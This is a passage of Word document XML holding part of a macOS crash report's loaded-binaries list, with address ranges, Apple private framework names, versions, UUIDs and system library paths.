        <w:t xml:space="preserve">    0x7fffc5c25000 -     0x7fffc5cb097f  com.apple.AppleJPEG (1.0 - 1) &lt;B4C3209B-58A5-359F-A898-F61B6C40E5E9&gt; /System/Library/PrivateFrameworks/AppleJPEG.framework/Versions/A/AppleJPEG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc5cc4000 -     0x7fffc5cdffff  com.apple.aps.framework (4.0 - 4.0) &lt;37A4B7F9-4F43-3A23-B4FC-E7656B5BC73F&gt; /System/Library/PrivateFrameworks/ApplePushService.framework/Versions/A/ApplePushService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc5ce0000 -     0x7fffc5ce8ffb  com.apple.AppleSRP (5.0 - 1) &lt;F105D2D2-8A12-3361-9C9D-E405668CAF75&gt; /System/Library/PrivateFrameworks/AppleSRP.framework/Versions/A/AppleSRP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc5ce9000 -     0x7fffc5cecff3  com.apple.AppleSystemInfo (3.1.5 - 3.1.5) &lt;6FF50E26-5BDA-3421-BDAE-B57AE6E4F6AC&gt; /System/Library/PrivateFrameworks/AppleSystemInfo.framework/Versions/A/AppleSystemInfo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc5ced000 -     0x7fffc5d3ffff  com.apple.AppleVAFramework (5.0.34 - 5.0.34) &lt;42A46C0E-877D-349C-A30A-5CA29896391B&gt; /System/Library/PrivateFrameworks/AppleVA.framework/Versions/A/AppleVA</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc5d48000 -     0x7fffc5d4fffb  com.apple.AssetCacheServices (31 - 31) &lt;13E874CA-86AB-33E7-A4D8-544D3B8157CD&gt; /System/Library/PrivateFrameworks/AssetCacheServices.framework/Versions/A/AssetCacheServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffc60cc000 -     0x7fffc614aff7  com.apple.backup.framework (1.8.1 - 1.8.1) &lt;792B4983-DE9A-377D-8338-93719706D12F&gt; /System/Library/PrivateFrameworks/Backup.framework/Versions/A/Backup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc67ba000 -     0x7fffc67e1fff  com.apple.CalendarAgentLink (8.0 - 250) &lt;26CB59F5-7D23-312B-9B1E-EB47D6490A16&gt; /System/Library/PrivateFrameworks/CalendarAgentLink.framework/Versions/A/CalendarAgentLink</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc6d68000 -     0x7fffc6d8fffb  com.apple.ChunkingLibrary (172 - 172) &lt;83E91936-305D-32A4-A256-5582B96B1852&gt; /System/Library/PrivateFrameworks/ChunkingLibrary.framework/Versions/A/ChunkingLibrary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc6d90000 -     0x7fffc6e22ffb  com.apple.CloudDocs (1.0 - 483.3) &lt;35F99B99-6F99-37F2-B347-8B8E86D83878&gt; /System/Library/PrivateFrameworks/CloudDocs.framework/Versions/A/CloudDocs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc76b6000 -     0x7fffc76bfffb  com.apple.CommonAuth (4.0 - 2.0) &lt;D561391D-80B8-35F8-9EFF-1ACC89895E38&gt; /System/Library/PrivateFrameworks/CommonAuth.framework/Versions/A/CommonAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc7785000 -     0x7fffc77d3fff  com.apple.AddressBook.ContactsFoundation (8.0 - 2250) &lt;5588F340-F4A8-3806-8642-08A106421B60&gt; /System/Library/PrivateFrameworks/ContactsFoundation.framework/Versions/A/ContactsFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc77d4000 -     0x7fffc77f6fff  com.apple.contacts.ContactsPersistence (1.0 - 2250) &lt;524C9EEC-D186-30B2-8A55-CC11A48CC44C&gt; /System/Library/PrivateFrameworks/ContactsPersistence.framework/Versions/A/ContactsPersistence</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc7840000 -     0x7fffc7c1dfe7  com.apple.CoreAUC (224.0.0 - 224.0.0) &lt;8DF6075A-0711-33A9-9031-6FDA22E85C4F&gt; /System/Library/PrivateFrameworks/CoreAUC.framework/Versions/A/CoreAUC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc7c1e000 -     0x7fffc7c4efff  com.apple.CoreAVCHD (5.9.0 - 5900.4.1) &lt;5E1B0512-E50B-3534-99EF-AD15E601877A&gt; /System/Library/PrivateFrameworks/CoreAVCHD.framework/Versions/A/CoreAVCHD</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc7cc3000 -     0x7fffc7ccbffb  com.apple.frameworks.CoreDaemon (1.3 - 1.3) &lt;212D3DB2-DC44-329F-B810-238DF156D1EE&gt; /System/Library/PrivateFrameworks/CoreDaemon.framework/Versions/B/CoreDaemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffc7ddb000 -     0x7fffc7decff7  com.apple.CoreEmoji (1.0 - 39.1) &lt;54432658-8481-3F33-ADED-B60684311E11&gt; /System/Library/PrivateFrameworks/CoreEmoji.framework/Versions/A/CoreEmoji</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc7ea1000 -     0x7fffc7eb7fff  com.apple.CoreMediaAuthoring (2.2 - 955) &lt;0D83B2A2-E541-3FFB-ACEC-E848F9C847E7&gt; /System/Library/PrivateFrameworks/CoreMediaAuthoring.framework/Versions/A/CoreMediaAuthoring</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc7ebe000 -     0x7fffc7f4effb  com.apple.CorePDF (4.0 - 4) &lt;42FD0781-A19C-3E36-BFDA-DAEAFB3A3115&gt; /System/Library/PrivateFrameworks/CorePDF.framework/Versions/A/CorePDF</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc80ce000 -     0x7fffc80feff3  com.apple.CoreServicesInternal (276 - 276) &lt;CCB21255-89DC-3F53-A6D6-8FA8F693C837&gt; /System/Library/PrivateFrameworks/CoreServicesInternal.framework/Versions/A/CoreServicesInternal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc8387000 -     0x7fffc8411fff  com.apple.CoreSymbolication (61050) &lt;15C4AF49-2F85-3265-B53F-4925616C746E&gt; /System/Library/PrivateFrameworks/CoreSymbolication.framework/Versions/A/CoreSymbolication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc8412000 -     0x7fffc8550fcf  com.apple.coreui (2.1 - 426.9.1) &lt;A7672B5D-9972-34B8-968A-188D422083AE&gt; /System/Library/PrivateFrameworks/CoreUI.framework/Versions/A/CoreUI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc8551000 -     0x7fffc85f0ffb  com.apple.CoreUtils (4.3 - 430.70) &lt;946F5089-9F8D-3595-8208-AD945B26D267&gt; /System/Library/PrivateFrameworks/CoreUtils.framework/Versions/A/CoreUtils</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc8640000 -     0x7fffc86a5ff3  com.apple.framework.CoreWiFi (12.0 - 1200.25.1) &lt;8DAD3903-9A77-3E50-99C4-3C5708FB25B1&gt; /System/Library/PrivateFrameworks/CoreWiFi.framework/Versions/A/CoreWiFi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc86a6000 -     0x7fffc86b3fff  com.apple.CrashReporterSupport (10.12 - 816) &lt;BF292E0C-6CDB-3149-8177-4EF5DD72D544&gt; /System/Library/PrivateFrameworks/CrashReporterSupport.framework/Versions/A/CrashReporterSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc8725000 -     0x7fffc8758ff7  com.apple.datadetectors (5.0 - 348) &lt;018E6565-860F-39E2-9C2E-D730668CE326&gt; /System/Library/PrivateFrameworks/DataDetectors.framework/Versions/A/DataDetectors</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffc8759000 -     0x7fffc87d0ff3  com.apple.datadetectorscore (7.0 - 539) &lt;AA02538E-706E-305B-AABA-FA9A6F4C1B8C&gt; /System/Library/PrivateFrameworks/DataDetectorsCore.framework/Versions/A/DataDetectorsCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc880a000 -     0x7fffc8849fff  com.apple.DebugSymbols (137 - 137) &lt;B229F3F7-250B-3151-8048-CEA7BF80FA52&gt; /System/Library/PrivateFrameworks/DebugSymbols.framework/Versions/A/DebugSymbols</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc884a000 -     0x7fffc895bfff  com.apple.desktopservices (1.11.1 - 1.11.1) &lt;03518A59-79B1-3B16-B923-52D6EFF04ADB&gt; /System/Library/PrivateFrameworks/DesktopServicesPriv.framework/Versions/A/DesktopServicesPriv</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc8a9a000 -     0x7fffc8aa4ff7  com.apple.DisplayServicesFW (3.1 - 380) &lt;6E891145-62C3-35B9-90A5-21BC0CACDEDB&gt; /System/Library/PrivateFrameworks/DisplayServices.framework/Versions/A/DisplayServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffc8c27000 -     0x7fffc9058ff7  com.apple.vision.FaceCore (3.3.2 - 3.3.2) &lt;DEB42099-6927-332C-8D3E-D45096318D25&gt; /System/Library/PrivateFrameworks/FaceCore.framework/Versions/A/FaceCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffca393000 -     0x7fffca393fff  libmetal_timestamp.dylib (600.0.48.26) &lt;681B9F09-0673-3C38-B636-9D77D338D1AF&gt; /System/Library/PrivateFrameworks/GPUCompiler.framework/libmetal_timestamp.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffca65d000 -     0x7fffca679ff7  com.apple.GenerationalStorage (2.0 - 259) &lt;43D40063-BD46-3008-8992-FF092B7C9A58&gt; /System/Library/PrivateFrameworks/GenerationalStorage.framework/Versions/A/GenerationalStorage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffca691000 -     0x7fffcad29ff7  com.apple.GeoServices (1.0 - 1228.21.7.28.8) &lt;E45ACAE1-FBF1-3275-A6DD-6D5092FD6EFC&gt; /System/Library/PrivateFrameworks/GeoServices.framework/Versions/A/GeoServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcad6f000 -     0x7fffcade5ffb  com.apple.Heimdal (4.0 - 2.0) &lt;418DD668-7288-3D33-BAFE-959DB96D0351&gt; /System/Library/PrivateFrameworks/Heimdal.framework/Versions/A/Heimdal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcb3f8000 -     0x7fffcb3ffffb  com.apple.IOAccelerator (288.15 - 288.15) &lt;DE5BC493-2F4E-3388-A887-DA5AD7BAD3F4&gt; /System/Library/PrivateFrameworks/IOAccelerator.framework/Versions/A/IOAccelerator</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffcb401000 -     0x7fffcb415ff3  com.apple.IOPresentment (1.0 - 25) &lt;40934217-996A-3DDB-A8C4-484CA0F0222B&gt; /System/Library/PrivateFrameworks/IOPresentment.framework/Versions/A/IOPresentment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcb416000 -     0x7fffcb438ff7  com.apple.IconServices (74.1 - 74.1) &lt;F7B83970-4A72-3186-BBB3-90FA86C3E263&gt; /System/Library/PrivateFrameworks/IconServices.framework/Versions/A/IconServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcb4d3000 -     0x7fffcb4e3ff3  com.apple.IntlPreferences (2.0 - 216) &lt;5E2D8D16-DBB9-3389-9CEA-1E4094C34A92&gt; /System/Library/PrivateFrameworks/IntlPreferences.framework/Versions/A/IntlPreferences</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcb51a000 -     0x7fffcb6cefff  com.apple.LanguageModeling (1.0 - 123) &lt;10152D7F-C7C0-34AA-A295-D712D16C76E6&gt; /System/Library/PrivateFrameworks/LanguageModeling.framework/Versions/A/LanguageModeling</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcb7a9000 -     0x7fffcb87aff3  com.apple.MMCS (1.3 - 379) &lt;14867D2F-6E87-351E-AB4B-9BD759364DFD&gt; /System/Library/PrivateFrameworks/MMCS.framework/Versions/A/MMCS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcbd14000 -     0x7fffcbd17fff  com.apple.Mangrove (1.0 - 1) &lt;05039E9F-9C07-375B-A940-D90D455A2EC2&gt; /System/Library/PrivateFrameworks/Mangrove.framework/Versions/A/Mangrove</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcbf7a000 -     0x7fffcbff2fef  com.apple.MetalPerformanceShaders.MetalPerformanceShaders (1.0 - 1) &lt;EDE6F9AA-B863-3936-BA54-177B769080FD&gt; /System/Library/PrivateFrameworks/MetalPerformanceShaders.framework/Versions/A/MetalPerformanceShaders</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcc158000 -     0x7fffcc163ff7  com.apple.MobileKeyBag (2.0 - 1.0) &lt;9E2D377E-C3D5-326F-B559-787AFCBA6728&gt; /System/Library/PrivateFrameworks/MobileKeyBag.framework/Versions/A/MobileKeyBag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcc174000 -     0x7fffcc19cfff  com.apple.MultitouchSupport.framework (368.4 - 368.4) &lt;18778258-70B1-31BF-845D-1FACBF280108&gt; /System/Library/PrivateFrameworks/MultitouchSupport.framework/Versions/A/MultitouchSupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcc249000 -     0x7fffcc253fff  com.apple.NetAuth (6.0 - 6.0) &lt;D57D5888-0290-3295-A1C4-D673D4DCB497&gt; /System/Library/PrivateFrameworks/NetAuth.framework/Versions/A/NetAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffcc648000 -     0x7fffcc64afff  com.apple.OAuth (25 - 25) &lt;1A29AF10-4AFE-32A2-9CA9-A98BACA2CE8D&gt; /System/Library/PrivateFrameworks/OAuth.framework/Versions/A/OAuth</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcca2f000 -     0x7fffcca70ff7  com.apple.PerformanceAnalysis (1.145 - 145) &lt;73A73364-EFB6-3D0A-A7EA-7F924359B3C9&gt; /System/Library/PrivateFrameworks/PerformanceAnalysis.framework/Versions/A/PerformanceAnalysis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffccab4000 -     0x7fffccabbff3  com.apple.phonenumbers (1.1.1 - 105) &lt;14003B00-D2DA-3732-A1AC-A71763EC3556&gt; /System/Library/PrivateFrameworks/PhoneNumbers.framework/Versions/A/PhoneNumbers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcd0d6000 -     0x7fffcd101ffb  com.apple.ProtectedCloudStorage (1.0 - 1) &lt;614C38AC-9D97-30D8-A196-02688634B584&gt; /System/Library/PrivateFrameworks/ProtectedCloudStorage.framework/Versions/A/ProtectedCloudStorage</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcd102000 -     0x7fffcd11cfff  com.apple.ProtocolBuffer (1 - 249) &lt;D8B7694B-B598-3728-8583-9C4CC0F05B64&gt; /System/Library/PrivateFrameworks/ProtocolBuffer.framework/Versions/A/ProtocolBuffer</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcd11d000 -     0x7fffcd12dffb  com.apple.QuickLookThumbnailing (1.0 - 1) &lt;DD5F14E6-A8A8-3EA8-96A3-4C84092BC18F&gt; /System/Library/PrivateFrameworks/QuickLookThumbnailing.framework/Versions/A/QuickLookThumbnailing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcd136000 -     0x7fffcd159ff3  com.apple.RemoteViewServices (2.0 - 124) &lt;280DB828-4613-3DF8-ACBA-C91989B64347&gt; /System/Library/PrivateFrameworks/RemoteViewServices.framework/Versions/A/RemoteViewServices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcdd8c000 -     0x7fffcdd8ffff  com.apple.SecCodeWrapper (4.0 - 307.20.1) &lt;2BBC8E7C-7B28-39D2-8273-2BA5ED7DAC45&gt; /System/Library/PrivateFrameworks/SecCodeWrapper.framework/Versions/A/SecCodeWrapper</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcde1d000 -     0x7fffcde99fff  com.apple.Sharing (671.15 - 671.15) &lt;37C29D52-CA6E-3E30-9CCF-F7B4A8DE6B9B&gt; /System/Library/PrivateFrameworks/Sharing.framework/Versions/A/Sharing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    0x7fffcdeba000 -     0x7fffce10cfef  com.apple.SkyLight (1.600.0 - 108.11) &lt;5D0C258E-0816-3FF2-AA3C-A7B9F2DEC19C&gt; /System/Library/PrivateFrameworks/SkyLight.framework/Versions/A/SkyLight</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffce2e6000 -     0x7fffce2f2fff  com.apple.SpeechRecognitionCore (3.0.15 - 3.0.15) &lt;BE386037-4B61-341F-80E2-5D8B5B50C8BC&gt; /System/Library/PrivateFrameworks/SpeechRecognitionCore.framework/Versions/A/SpeechRecognitionCore</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffce9d6000 -     0x7fffcea42ff3  com.apple.Symbolication (61080.2) &lt;8AB6B520-E8DE-392F-8B86-52098D2A2BA2&gt; /System/Library/PrivateFrameworks/Symbolication.framework/Versions/A/Symbolication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcee39000 -     0x7fffcee3fff7  com.apple.TCC (1.0 - 1) &lt;787E8FD8-21A7-39E6-87D4-6AD09156C5A0&gt; /System/Library/PrivateFrameworks/TCC.framework/Versions/A/TCC</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffceecb000 -     0x7fffcf08cff3  com.apple.TextureIO (1.35 - 1.35) &lt;63D75E50-F3C2-3E8E-A49B-F53531C24C54&gt; /System/Library/PrivateFrameworks/TextureIO.framework/Versions/A/TextureIO</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcf0d5000 -     0x7fffcf0eaff3  com.apple.ToneKit (1.0 - 1) &lt;ACFC15FF-6BB9-3D0F-B94E-617E9D1362DA&gt; /System/Library/PrivateFrameworks/ToneKit.framework/Versions/A/ToneKit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcf0eb000 -     0x7fffcf0f9ffb  com.apple.ToneLibrary (1.0 - 1) &lt;32AD3F5C-124F-351D-BC9B-63A7AEA20F31&gt; /System/Library/PrivateFrameworks/ToneLibrary.framework/Versions/A/ToneLibrary</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcf102000 -     0x7fffcf291ffb  com.apple.UIFoundation (1.0 - 489) &lt;0CD14719-FC52-3AC5-87EF-775437927990&gt; /System/Library/PrivateFrameworks/UIFoundation.framework/Versions/A/UIFoundation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffcfce2000 -     0x7fffcfd91ff7  com.apple.ViewBridge (276 - 276) &lt;55494F8D-A20F-3D64-826F-E136D77AFC9D&gt; /System/Library/PrivateFrameworks/ViewBridge.framework/Versions/A/ViewBridge</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd01b9000 -     0x7fffd01bffff  com.apple.XPCService (2.0 - 1) &lt;BC3FCE26-6219-3316-949F-37F7005C9A0F&gt; /System/Library/PrivateFrameworks/XPCService.framework/Versions/A/XPCService</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0290000 -     0x7fffd0292ffb  com.apple.loginsupport (1.0 - 1) &lt;03B57D6F-C210-32BC-B384-5B0E95660283&gt; </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>/System/Library/PrivateFrameworks/login.framework/Versions/A/Frameworks/loginsupport.framework/Versions/A/loginsupport</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd02be000 -     0x7fffd02e5ff3  com.apple.contacts.vCard (1.0 - 2250) &lt;443AB8FC-1C0F-3505-8C90-CDE600C9C73E&gt; /System/Library/PrivateFrameworks/vCard.framework/Versions/A/vCard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd02e7000 -     0x7fffd0302ff7  libCRFSuite.dylib (34) &lt;BACC371B-6153-36B5-BC54-3BCF26FBB221&gt; /usr/lib/libCRFSuite.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd0303000 -     0x7fffd030efff  libChineseTokenizer.dylib (21) &lt;09E74E18-ADB2-30D2-A858-13691CB1186C&gt; /usr/lib/libChineseTokenizer.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
        <w:t xml:space="preserve">    0x7fffd03a0000 -     0x7fffd03a1ff3  libDiagnosticMessagesClient.dylib (102) &lt;422911A4-E273-3E88-BFC4-DF6470E48242&gt; /usr/lib/libDiagnosticMessagesClient.dylib</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00224DD4" w:rsidRDefault="00224DD4" w:rsidP="00224DD4">
      <w:r>
